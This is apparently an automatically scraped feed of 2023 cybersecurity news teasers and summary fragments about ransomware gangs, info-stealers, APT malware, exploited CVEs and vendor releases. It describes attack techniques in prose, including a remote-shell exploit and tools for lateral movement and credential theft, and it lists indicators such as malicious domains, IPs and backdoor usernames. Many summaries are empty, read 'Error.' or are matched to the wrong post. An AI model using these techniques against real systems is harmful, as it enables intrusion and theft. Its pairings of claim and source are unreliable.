The CVEs listed as actively exploited are: CVE-2023-26083: a memory leak vulnerability in Mali GPU Kernel Driver in Midgard GPU Kernel Driver all versions from r6p0 - r32p0, Bifrost GPU Kernel Driver all versions from r0p0 - r42p0, Valhall GPU Kernel Driver all versions from r19p0 - r42p0, and Avalon GPU Kernel Driver all versions from r41p0 - r42p0 allows a non-privileged user to make valid GPU processing operations that expose sensitive kernel metadata. "As 40% of consumers harbor skepticism regarding organizations’ data protection capabilities, 75% would shift to alternate companies following a ransomware attack, according to Object First. Consumers request data protection Furthermore, consumers request increased data protection from vendors, with 55% favoring companies with comprehensive data protection measures such as reliable backup and recovery, password protection, and identity and access management strategies. As organizations intensify their digital transformation initiatives, data volume expands exponentially while ransomware attacks dominate … More
The post 75% of consumers prepared to ditch brands hit by ransomware appeared first on Help Net Security.
"Autosummary:
Consumers request data protection Furthermore, consumers request increased data protection from vendors, with 55% favoring companies with comprehensive data protection measures such as reliable backup and recovery, password protection, and identity and access management strategies. "Healthcare continues to be one of the most attractive targets for cyberattackers, and the number of breaches affecting the industry is increasing yearly. In this Help Net Security video, Steve Gwizdala, VP of Healthcare at ForgeRock, discusses how vigilance and new ways of enhancing cybersecurity measures will be crucial to healthcare organizations and businesses responsible for protecting consumers’ online information – across the entire supply chain. There needs to be more than the traditional password … More
The post How ransomware impacts the healthcare industry appeared first on Help Net Security.
"Autosummary:
"Swedish data protection watchdog warns companies against using Google Analytics due to the risk of surveillance operated by the US government. The Swedish data protection watchdog warned businesses against using Google Analytics due to the risk of surveillance carried out by the US government. The Swedish Authority for Privacy Protection (IMY) conducted audits against CDON, […]
The post Swedish data protection authority rules against the use of Google Analytics appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, surveillance) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"A npm package"s manifest is published independently from its tarball," Darcy Clarke, a former GitHub and npm engineering manager, said in a technical write-up published last week. "Autosummary:
Phishing message as seen by the recipient (github.com/Octoberfest7) TeamsPhisher first verifies the existence of the target user and their ability to receive external messages, which is a prerequisite for the attack to work. "Autosummary:
Following a successful breach, the malicious binary is used as a conduit to set up persistence, perform the actual browser update, and also drop a stealer capable of covertly harvesting sensitive information and encrypting the stolen files, leaving the victims at risk of potential data loss, exposure, or even the sale of their valuable data. "The Port of Nagoya, the largest port in Japan, suffered a ransomware attack that severely impacted its operations. The Port of Nagoya, in the Ise Bay, is the largest and busiest trading port in Japan, accounting for about 10% of the total trade value of Japan. Notably, this port is the largest exporter of cars […]
The post The Port of Nagoya, the largest Japanese port, suffered a ransomware attack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Port of Nagoya) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "RedEnergy is a sophisticated stealer-as-a-ransomware that was employed in attacks targeting energy utilities, oil, gas, telecom, and machinery sectors. Zscaler ThreatLabz researchers discovered a new Stealer-as-a-Ransomware named RedEnergy used in attacks against energy utilities, oil, gas, telecom, and machinery sectors. The malware allows operators to steal information from various browsers, it also supports ransomware capabilities. […]
The post RedEnergy Stealer-as-a-Ransomware employed in attacks in the wild appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, RedStealer) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Zscaler ThreatLabz researchers discovered a new Stealer-as-a-Ransomware named RedEnergy used in attacks against energy utilities, oil, gas, telecom, and machinery sectors. "Categories: Threat Intelligence Tags: malvertising Tags: google Tags: usps Tags: phishing Next time you need to track a package, be aware that malicious ads could be leading you to sites that steal your banking information. |
The post Malicious ad for USPS fishes for banking credentials appeared first on Malwarebytes Labs.
"Autosummary:
For example, here we have a VISA card and the associated bank is JP Morgan: For a different card such as MasterCard, here"s the associated phishing page: Falling for malvertising remains too easy In the security field, we often speak about and recommend user education and training. Indicators of Compromise (IOCs) logictrackngs[.]com super-trackings[.]com web-trackings[.]com tracks4me[.]biz forgetrackng[.]com Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. "Autosummary:
"A Mexican threat actor that goes online with the moniker Neo_Net is behind an Android malware campaign targeting banks worldwide. A joint study conducted by vx-underground and SentinelOne recently revealed that a Mexican threat actor that goes online with the moniker Neo_Net is behind an Android malware campaign targeting financial institutions worldwide. The case was […]
The post Neo_Net runs eCrime campaign targeting clients of banks globally appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, cybercrime) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Categories: News Categories: Personal Tags: Europol Tags: relative Tags: law enforcement The head of a criminal network responsible for defrauding hundreds of elderly people has been arrested, Europol has announced. |
The post Elderly targeted in car accident scam, kingpin arrested appeared first on Malwarebytes Labs.
"Autosummary:
Don’t fall for them It is important to stay vigilant and protect yourself from scam calls by following these guidelines: Don’t share personal or financial information with unknown or unexpected callers If someone is saying they are a relative of yours, check via another way—by calling them back on their own phone or other means to verify it is really them. "Autosummary:
IBM Security X-Force, in a recent deep dive, said the gang"s crypters, which are applications designed to encrypt and obfuscate malware to evade detection by antivirus scanners and hinder analysis, are being used to also disseminate new malware strains such as Aresloader, Canyon, CargoBay, DICELOADER, Lumma C2, Matanbuchus, Minodo (formerly Domino), Pikabot, SVCReady, Vidar. "Autosummary:
To demonstrate that CVE-2023-27997 can be used to execute code remotely on vulnerable devices, Bishop Fox created an exploit that allows "smashes the heap, connects back to an attacker-controlled server, downloads a BusyBox binary, and opens an interactive shell. "Autosummary:
"Researchers spotted a new version of the RustBucket Apple macOS malware that supports enhanced capabilities. Researchers from the Elastic Security Labs have spotted a new variant of the RustBucket Apple macOS malware. In April, the security firm Jamf observed the North Korea-linked BlueNoroff APT group using a new macOS malware, dubbed RustBucket. The group BlueNoroff is considered a group that […]
The post Experts detected a new variant of North Korea-linked RUSTBUCKET macOS malware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share OnThe malware is a Rust binary that gathers info of the infected system (Computer name, List of active processes, Current timestamp, Installation timestamp, System boot time, and Status of all running processes within the system) and downloads and runs additional malicious code. "Autosummary:
Map of SmugX targets (Check Point) Among the samples that Check Point collected during the investigation are: A letter from the Serbian embassy in Budapest a document stating the priorities of the Swedish Presidency of the Council of the European Union an invitation to a diplomatic conference issued by Hungary’s Ministry of Foreign Affairs an article about two Chinese human rights lawyers The lures used in the SmugX campaign betray the threat actor"s target profile and indicates espionage as the likely objective of the campaign. "US CISA added actively exploited Samsung and D-Link vulnerabilities to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added six Samsung and two D-Link vulnerabilities to its Known Exploited Vulnerabilities Catalog. Below is the list of flaws added to the catalog: The CVE-2019-17621 flaw is a remote command execution flaw that resides in […]
The post CISA adds Samsung and D-link bugs to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Unlocking internet’s secrets via monitoring, data collection, and analysis In this Help Net Security interview, Ryan Woodley, CEO of Netcraft, discusses the importance of monitoring, collecting, and analyzing internet data to gain a profound understanding of the internet. Preparing health systems for cyber risks and insurance coverage In this Help Net Security interview, Dennis Fridrich, VP of Cybersecurity at TRIMEDX, … More
The post Week in review: 5 free online cybersecurity courses, 8Base ransomware group leaks data appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Unlocking internet’s secrets via monitoring, data collection, and analysis In this Help Net Security interview, Ryan Woodley, CEO of Netcraft, discusses the importance of monitoring, collecting, and analyzing internet data to gain a profound understanding of the internet. "Autosummary:
"While the plugin has a preset defined list of banned keys, that a user should not be able to update, there are trivial ways to bypass filters put in place such as utilizing various cases, slashes, and character encoding in a supplied meta key value in vulnerable versions of the plugin," Wordfence researcher Chloe Chamberland said. "Autosummary:
"Avast released a free decryptor for the Akira ransomware that can allow victims to recover their data without paying the ransom. Cybersecurity firm Avast released a free decryptor for the Akira ransomware that can allow victims to recover their data without paying the ransom. The Akira ransomware has been active since March 2023, the threat […]
The post Avast released a free decryptor for the Windows version of the Akira ransomware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Akira ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On The Akira ransomware has been active since March 2023, the threat actors behind the malware claim to have already hacked multiple organizations in multiple industries, including education, finance, and real estate, Akira is a Windows ransomware with a 64-bit Windows binary, it is written in C++ and uses the Boost library to implement the asynchronous encryption code. "The LockBit ransomware gang claims to have hacked Taiwan Semiconductor Manufacturing Company (TSMC). The LockBit ransomware group this week claimed to have hacked the Taiwan Semiconductor Manufacturing Company (TSMC) and $70 million ransom. TSMC is the world’s biggest contract manufacturer of chips for tech giants, including Apple and Qualcomm Inc. As reported by BleepingComputer, on Wednesday, […]
The post LockBit gang demands a $70 million ransom to the semiconductor manufacturing giant TSMC appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
PsExec , BitsAdmin , and Curl , used for lateral movement , , and , used for lateral movement AnyDesk : legitimate remote management tool abused for maintaining persistence : legitimate remote management tool abused for maintaining persistence KillAV BAT script used for disabling or bypassing antivirus and antimalware programs. Complete attack chain (Trend Micro) Other tools used by ALPHV Having Cobalt Strike running on the system, it is easy to execute additional scripts, fetch tools for lateral movement, and generally deepen the compromise. "IT teams are struggling to monitor and enforce BYOD (Bring Your Own Device) policies during summer months when more employees are often traveling or working remotely, according to ThreatX. With more endpoints and applications in use, and often personal rather than corporate issued, the risk to corporate data may increase. Given APIs are the driving force behind these connections, the study reinforces the need for prioritizing API and application security. ThreatX surveyed 2,000 consumers across … More
The post Employees worry less about cybersecurity best practices in the summer appeared first on Help Net Security.
"Autosummary:
Factors such as increased remote work and travel, and even employees’ children using parents’ devices to browse the internet and play games, all can potentially expose corporate data through attacked APIs,” said Jeremy Ventura, Director, Security Strategy & Field CISO at ThreatX. “To avoid this, it’s important organizations strengthen the visibility and security by tracking, monitoring, and uncovering vulnerable API and applications,” Ventura added. "A critical authentication bypass flaw in miniOrange’s WordPress Social Login and Register plugin, can allow gaining access to any account on a site. Wordfence researchers discovered an authentication bypass vulnerability in miniOrange’s WordPress Social Login and Register plugin, that can allow an unauthenticated attacker to gain access to any account on a site by knowing the associated email […]
The post miniOrange’s WordPress Social Login and Register plugin was affected by a critical auth bypass bug appeared first on Security Affairs.
"Autosummary:
WordPress Social Login Plugin allows social login, social share & commenting using widely used apps like Facebook, Google, LinkedIn, Twitter, Apple, Discord, Twitch, Line, Wechat, 40 other apps available. "North Korea-linked cyberespionage group Andariel used a previously undocumented malware called EarlyRat. Kaspersky researchers reported that the North Korea-linked APT group Andariel used a previously undocumented malware dubbed EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. The Andariel APT (aka Stonefly) has been active since at least 2015, it was involved in several attacks attributed to the North Korean government. The […]
The post North Korea-linked Andariel APT used a new malware named EarlyRat last year appeared first on Security Affairs.
"Autosummary:
The experts also identified a set of off-the-shelf tools used by Andariel during the command execution phase, including: Supremo remote desktop; 3Proxy; Powerline; Putty; Dumpert; NTDSDumpEx; ForkDump; The malware EarlyRat was dropped via phishing messages using weaponized documents. "Autosummary:
"Autosummary:
Akira encryption Avast"s analysis of Akira"s encryption scheme confirms previous reports, describing that the malware uses a symmetric key generated by CryptGenRandom, which is then encrypted by a bundled RSA-4096 public key and appended to the end of an encrypted file. "Autosummary:
TSMC is one of the world"s largest semiconductor manufacturers, with its products used in a wide variety of devices, including smartphones, high performance computing, IoT devices, automotive, and digital consumer electronics. "Autosummary:
"Autosummary:
WordPress sites hacked using CVE-2023-3460 in these attacks will show the following indicators: Appearance of new administrator accounts on the website Usage of the usernames wpenginer, wpadmins, wpengine_backup, se_brutal, segs_brutal Log records showing that IPs known to be malicious accessed the Ultimate Member registration page Log records showing access from 146.70.189.245, 103.187.5.128, 103.30.11.160, 103.30.11.146, and 172.70.147.176 Appearance of a user account with an email address associated to "exelica.com" Installation of new WordPress plugins and themes on the site Because the critical flaw remains unpatched and is so easy to exploit, WordFence recommends the Ultimate Member plugin be uninstalled immediately. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @fwosar, @demonslay335, @billtoulas, @Seifreed, @LawrenceAbrams, @malwrhunterteam, @struppigel, @serghei, @rivitna2, @Avast, @AuCyble, @VMware, @pcrisk, @BushidoToken, and @BrettCallow. "Categories: Personal Tags: evil dead Tags: evil dead rise Tags: fake Tags: scam Tags: podcast Tags: movie Tags: download Tags: stream Tags: audible Tags: amazon music Tags: bruce Campbell Tags: sam ramai Tags: lily Sullivan Tags: Alyssa Sutherland Tags: lee Cronin Tags: chainsaw We take a look at a bogus Amazon podcast listing which promises free streams of Evil Dead Rise. |
The post "Free" Evil Dead Rise movie scam lurks in Amazon listings appeared first on Malwarebytes Labs.
"Autosummary:
In testing, we saw a program claiming to offer all manner of media downloads: In another test, we were directed to an odd payment page: I say odd, because the URL contains the word “antivirus”, which would suggest you’re potentially signing up for a security service of some kind.I don’t know, but the page says this at the top: “This is a special offer for a limited period of 3 days which comes with a £13.00 welcome gift card to explore and buy products in one of our affiliates’ websites.Evil Dead Rise, the breakout horror film of 2023, started with big cinema numbers and has moved on to a victory lap in streaming land for good measure. "Autosummary:
"Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Thom Langford – @ThomLangford Episode links: Sponsored by: Bitwarden – Password security you can trust. "Autosummary:
The evolving stealer, like other malware families of its kind, is equipped to gather system metadata, including BIOS release date and vendor, total/free disk space on the C drive, currently running processes, register usernames, and volume information. "Data protection firm Arcserve addressed an authentication bypass vulnerability in its Unified Data Protection (UDP) backup software. Data protection vendor Arcserve addressed a high-severity bypass authentication flaw, tracked as CVE-2023-26258, in its Unified Data Protection (UDP) backup software. Threat actors can exploit the vulnerability to bypass authentication and gain admin privileges. Arcserve Unified Data Protection […]
The post Experts published PoC exploits for Arcserve UDP authentication bypass issue appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, backup) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"To mitigate this issue, you can uninstall apps which integrate with Windows, Microsoft Office, Microsoft Outlook or Outlook Calendar," Redmond says. "Autosummary:
Chrome process running in the background (BleepingComputer) While Trellix, Malwarebytes, and WatchGuard have now addressed this known issue, Cisco customers are advised to turn off anti-exploit protection in their security software"s settings or configure Google Chrome as the default web browser through the system"s Settings menu until a fix is available. "Autosummary:
"Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control (C2) server," Kaspersky said in a new report. "Autosummary:
"Autosummary:
CWE-287 Improper Authentication 6.39 10 +1 14 CWE-190 Integer Overflow or Wraparound 5.89 4 -1 15 CWE-502 Deserialization of Untrusted Data 5.56 14 -3 16 CWE-77 Improper Neutralization of Special Elements used in a Command ("Command Injection") 4.95 4 +1 17 CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer 4.75 7 +2 18 CWE-798 Use of Hard-coded Credentials 4.57 2 -3 19 CWE-918 Server-Side Request Forgery (SSRF) 4.56 16 +2 20 CWE-306 Missing Authentication for Critical Function 3.78 8 -2 21 CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ("Race Condition") 3.53 8 +1 22 CWE-269 Improper Privilege Management 3.31 5 +7 23 CWE-94 Improper Control of Generation of Code ("Code Injection") 3.30 6 +2 24 CWE-863 Incorrect Authorization 3.16 0 +4 25 CWE-276 Incorrect Default Permissions 3.16 0 -5 Warnings regarding software and hardware bugs In a collaborative effort involving cybersecurity authorities worldwide, a comprehensive compilation of the top 15 vulnerabilities commonly exploited in attacks throughout 2021 was released in April 2022. "Autosummary:
"Autosummary:
Error. "Autosummary:
"A new Windows information stealer dubbed ThirdEye appeared in the threat landscape, it has been active since April. Fortinet FortiGuard Labs discovered a previously undetected information stealer named ThirdEye. The malicious code is not sophisticated and can allow operators to steal various information from the infected machines. Fortinet started investigating the threat after the discovery of an […]
The post Previously undetected ThirdEye malware appears in the threat landscape appeared first on Security Affairs.
"Autosummary:
Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
By exploiting the flaw in Log4j software, Andariel downloaded off-the-shelf tools like 3Proxy, Putty, Dumpert, and Powerline to perform network reconnaissance, credential stealing, and lateral movement. "Android app LetMeSpy disclosed a security breach, sensitive data associated with thousands of Android users were exposed. The phone monitoring app LetMeSpy disclosed a security breach, threat actors have stolen sensitive data associated with thousands of Android users, including messages, locations, call logs, e-mail addresses, and telephone numbers. According to a notice published by the company, the […]
The post The phone monitoring app LetMeSpy disclosed a data breach appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, data breach) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
" 8Base is part of a wave of ransomware newbies entering the market such as CryptNet, Xollam, and Mallox, even as known families like BlackCat, LockBit, and Trigona have witnessed continuous updates to their features and attack chains to broaden their horizons beyond Windows to infect Linux and macOS systems. "Autosummary:
Recognizing a Business Email Compromise Attack Running a business is complex, and with so many moving parts, attackers can attempt different angles, targeting C-level executives, shipping departments, billing, or IT. To make the attack more effective, the threat actor may have researched their targets and attempted to match their language, terminology, style, and email address as closely as possible. But, with proper education and vigilance on the part of employees, paired with a robust password policy such as one offered by Specops Password Policy, these attacks can be mitigated. "Autosummary:
" 8Base data leak site on the dark web Source:BleepingComputer Links to other ransomware groups In a new report by VMware"s Carbon Black team, the tactics seen in recent 8Base attacks point to them being a rebrand of a well-established ransomware organization, potentially RansomHouse. "Lockbit 3.0 is currently the most active ransomware group, NCC Group says in its most recent Threat Pulse report, but new ransomware groups like 8Base and Akira are rising in prominence. Collectively, the various ransomware groups revealed 436 victim organizations in May 2023 – 24% more than in April 2023 (352), and 56% more that in May 2022. This considerable increase can be attributed, in part, to the 8Base ransomware group, which released data from … More
The post 8Base ransomware group leaks data of 67 victim organizations appeared first on Help Net Security.
"Autosummary:
This considerable increase can be attributed, in part, to the 8Base ransomware group, which released data from 67 victims they breached between April 2022 and May 2023 About 8Base ransomware group According to VMware Carbon Black’s Threat Analysis Unit (TAU), the group has been active since March 2022, but its activity has become more prominent now due to the significant number of data dumps released in May. "Bitdefender has agreed to acquire Horangi Cyber Security to address the growing demand for advanced, streamlined management of cybersecurity, compliance, and governance of multi-cloud environments. As organizations continue to accelerate cloud adoption, they struggle to manage the thousands of configuration settings and permissions, identities, and entitlements presented by multiple cloud providers. According to Gartner, “Misconfigured cloud resources continue to be a primary reason for cloud-related data breaches.” A single point of insight and control across … More
The post Bitdefender acquires Horangi Cyber Security to expand its unified risk and security analytics platform appeared first on Help Net Security.
"Autosummary:
In a 2023 report, Gartner noted that “CSPM is commonly purchased as part of a cloud-native application protection platform (CNAPP) that includes broader cloud security capabilities such as cloud workload protection platform (CWPP), cloud infrastructure entitlement management (CIEM), Kubernetes security posture management (KSPM), cloud detection and response (CDR).” "Autosummary:
"CryptoLabs made their scam schemes more convincing through region-focused tactics, such as hiring French-speaking callers as "managers" and creating fake landing pages, social media ads, documents, and investment platforms in the French language," Anton Ushakov, deputy head of Group-IB"s high-tech crime investigation department in Amsterdam, said. "Researchers warn of a massive spike in May and June 2023 of the activity associated with the ransomware group named 8Base. VMware Carbon Black researchers observed an intensification of the activity associated with a stealthy ransomware group named 8Base. The experts observed a massive spike in activity associated with this threat actor between May and June 2023. […]
The post Experts warn of a spike in May and June of 8Base ransomware attacks appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, 8Base) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Files encrypted by Akira on a Linux server Source: BleepingComputer When encrypting files, the Linux Akira encryptor will target the following extensions: .4dd, .accdb, .accdc, .accde, .accdr, .accdt, .accft, .adb, .ade, .adf, .adp, .arc, .ora, .alf, .ask, .btr, .bdf, .cat, .cdb, .ckp, .cma, .cpd, .dacpac, .dad, .dadiagrams, .daschema, .db-shm, .db-wa, .db3, .dbc, .dbf, .dbs, .dbt, .dbv, .dbx, .dcb, .dct, .dcx, .dlis, .dp1, .dqy, .dsk, .dsn, .dtsx, .eco, .ecx, .edb, .epim, .exb, .fcd, .fdb, .fic, .fmp, .fmp12, .fmps, .fp3, .fp4, .fp5, .fp7, .fpt, .frm, .gdb, .grdb, .gwi, .hdb, .his, .idb, .ihx, .itdb, .itw, .jet, .jtx, .kdb, .kexi, .kexic, .kexis, .lgc, .lwx, .maf, .maq, .mar, .mas, .mav, .mdb, .mdf, .mpd, .mrg, .mud, .mwb, .myd, .ndf, .nnt, .nrmlib, .ns2, .ns3, .ns4, .nsf, .nv2, .nwdb, .nyf, .odb, .oqy, .orx, .owc, .p96, .p97, .pan, .pdb, .pdm, .pnz, .qry, .qvd, .rbf, .rctd, .rod, .rodx, .rpd, .rsd, .sas7bdat, .sbf, .scx, .sdb, .sdc, .sdf, .sis, .spq, .sqlite, .sqlite3, .sqlitedb, .temx, .tmd, .tps, .trc, .trm, .udb, .usr, .v12, .vis, .vpd, .vvv, .wdb, .wmdb, .wrk, .xdb, .xld, .xmlff, .abcddb, .abs, .abx, .accdw, .adn, .db2, .fm5, .hjt, .icg, .icr, .lut, .maw, .mdn, .mdt, .vdi, .vhd, .vmdk, .pvm, .vmem, .vmsn, .vmsd, .nvram, .vmx, .raw, .qcow2, .subvo, .bin, .vsv, .avhd, .vmrs, .vhdx, .avdx, .vmcx, .iso "Autosummary:
When users of affected devices click the "View effective access" button under Properties > Advanced to check a shared file or folder effective permissions, they may see a message stating "Computing effective access...." without displaying the query results. "Autosummary:
"Autosummary:
Error. "Autosummary:
The shortcoming impacts the following products, with patches available in FortiNAC versions 7.2.2, 9.1.10, 9.2.8, and 9.4.3 or later - FortiNAC version 9.4.0 through 9.4.2 FortiNAC version 9.2.0 through 9.2.7 FortiNAC version 9.1.0 through 9.1.9 FortiNAC version 7.2.0 through 7.2.1 FortiNAC 8.8 all versions FortiNAC 8.7 all versions FortiNAC 8.6 all versions FortiNAC 8.5 all versions, and FortiNAC 8.3 all versions Also resolved by Fortinet is a medium-severity vulnerability tracked as CVE-2023-33300 (CVSS score: 4.8), an improper access control issue affecting FortiNAC 9.4.0 through 9.4.3 and FortiNAC 7.2.0 through 7.2.1. "Autosummary:
"Autosummary:
Its global cybersecurity experts are committed to securing the world"s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions.NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India. "Autosummary:
The list of top countries that are of interest to Anatsa based on the number of financial applications targeted include the U.S., Italy, Germany, the U.K., France, the U.A.E., Switzerland, South Korea, Australia, and Sweden. "Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including Schneider Electric and Siemens Energy. The Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial giants Schneider Electric and Siemens Energy. Both Schneider Electric and Siemens Energy provide […]
The post Schneider Electric and Siemens Energy are two more victims of a MOVEit attack appeared first on Security Affairs.
"Autosummary:
Below is the list of victims added to the group’s leak site: werum.com Schneider Electric (http://se.com) Siemens Energy (http://siemens-energy.com) UCLA (http://ucla.edu) Abbie (http://abbvie.com) For the uninitiated, Schneider Electric and Siemens Energy are two more notable victims as they are very large Industrial Control System (#ICS) vendors. "Index Engines announced CyberSense 8.3, which features several user experience updates highlighted by additional metrics after a ransomware attack is detected, a new setup wizard and system configuration interface. CyberSense scans backup data and snapshots to validate their integrity and identify malicious changes indicative of cyberattack. When an attack occurs, CyberSense provides forensic reporting to diagnose and recover to normal business operations. CyberSense’s user interface displays rich details on every attack, including the nature of … More
The post Index Engines CyberSense 8.3 identifies malicious changes indicative of cyberattack appeared first on Help Net Security.
"Autosummary:
"Delinea announced the latest release of Privilege Manager, its solution for providing privilege elevation controls for users and applications on workstations. The latest enhancements significantly improve ease of use for customers by preconfiguring five of the most common privilege elevation policies through the Workstation Policy Framework to simplify implementation and accelerate time to value. The 2023 Verizon Data Breach Investigations Report found that phishing makes up 44% of all social engineering incidents. According to the … More
The post Delinea Privilege Manager enhancements reduce phishing effectiveness appeared first on Help Net Security.
"Autosummary:
“Our mission is to make security seamless and with this release of Privilege Manager, which leverages customer feedback, users can enjoy easier policy management, better security, and less friction for an accelerated time to value of our solution.” "LexisNexis Risk Solutions has launched an end-to-end customer lifecycle management platform to help businesses effortlessly integrate multiple information sources to make better risk decisions and provide smoother customer journeys. LexisNexis RiskNarrative leverages automation and decisioning technology to provide a sophisticated, configurable and accessible financial crime lifecycle management solution. The growth of technology and digital platforms is changing how customers interact with businesses. Customers return to businesses expecting to be instantly recognized across multiple channels while … More
The post LexisNexis RiskNarrative helps organizations reduce risk and financial crime appeared first on Help Net Security.
"Autosummary:
Organizations can expedite risk decisions through this more holistic view that incorporates Know Your Customer (KYC), Know Your Business (KYB), Anti-Money Laundering (AML) activity, identity documentation, behavioral biometrics and enhanced fraud detection. "Autosummary:
Some of the well-known process injection techniques include dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging, among others. "Autosummary:
It designs, develops, and manufactures a wide range of industrial products, including industrial control systems (ICS), state-of-the-art power, heat generation units, renewable energy systems, on and off-site energy delivery systems, and flexible power transmission solutions. "Categories: Business Ransomware is like that stubborn cold that you thought you kicked, but creeps back up determined to run amok again. |
The post Understanding ransomware reinfection: An MDR case study appeared first on Malwarebytes Labs.
"Autosummary:
As part of our response, we raised a critical incident to the customer, carried out an extensive threat hunt, and identified two compromised domain admin accounts, a domain controller (DC), and an SQL server. Lessons from the Incident This episode underscores the relentless threat of ransomware reinfection in today"s threat landscape, as well as the critical role that 24x7x365 diligence of trained cybersecurity experts, swift responses, and collaborative efforts play in cyber defense. "Categories: News ChatGPT may have already hit its public perception wall, according to a Malwarebytes survey that showed high levels of distrust and concern in the tool"s trustworthiness and safety. |
The post 81% concerned about ChatGPT security and safety risks, Malwarebytes survey shows appeared first on Malwarebytes Labs.
"Autosummary:
Responses to "I trust the information produced by ChatGPT" by respondents familiar with ChatGPT A risk to security and safety Not only was ChatGPT seen as untrustworthy, it was also perceived as a negative influence on safety and security, with few seeing it as a tool that will improve safety, and an overwhelming majority seeing it as a source of risk. Responses to "The information produced by ChatGPT is accurate" by respondents familiar with ChatGPT The responses were similarly bleak for the statement "I trust the information produced by ChatGPT," with only 10% agreeing and a huge 63% disagreeing. Despite all the hype and hooplah surrounding it, only 35% of our tech-savvy respondents agreed with the statement "I am familiar with ChatGPT," significantly less than the 50% that disagreed. Responses to "ChatGPT and other AI tools will improve internet safety" by respondents familiar with ChatGPT Worse still, an extraordinary 81% were concerned about the possible security and/or safety risks. "Cryptography In this course, you’ll learn how to protect information to ensure its integrity, confidentiality, authenticity, and non-repudiation. You will develop a basic understanding of cryptographic concepts and how to apply them, implement secure protocols, key management concepts, critical administration and validation, and Public Key Infrastructure. Networks and Communications Security In this course, you will learn about the network structure, data transmission methods, transport formats, and the security measures used to maintain integrity, availability, authentication, … More
The post 5 free online cybersecurity courses you should check out appeared first on Help Net Security.
"Autosummary:
Networks and Communications Security In this course, you will learn about the network structure, data transmission methods, transport formats, and the security measures used to maintain integrity, availability, authentication, and confidentiality of the information being transmitted.Cryptography In this course, you’ll learn how to protect information to ensure its integrity, confidentiality, authenticity, and non-repudiation. "Attackers typically find exposed “secrets” – pieces of sensitive information that allow access to an enterprise cloud environment — in as little as two minutes and, in many cases, begin exploiting them almost instantly, highlighting the urgent need for comprehensive cloud security, according to Orca Security. Orca’s research was conducted between January and May 2023, beginning with the creation of “honeypots” on nine different cloud environments that simulated misconfigured resources in the cloud to entice … More
The post Uncovering attacker tactics through cloud honeypots appeared first on Help Net Security.
"Autosummary:
No region is safe Although 50% of all observed exposed AWS key usage took place in the United States, usage occurred in almost every other region as well, including Canada, APAC, Europe, and South America. "Researchers observed threat actors spreading a trojanized Super Mario Bros game installer to deliver multiple malware. Researchers from Cyble Research and Intelligence Labs (CRIL) discovered a trojanized Super Mario Bros game installer for Windows that was used to deliver multiple malware, including an XMR miner, SupremeBot mining client, and the Open-source Umbral stealer. The threat actors […]
The post Trojanized Super Mario Bros game spreads malware appeared first on Security Affairs.
"Autosummary:
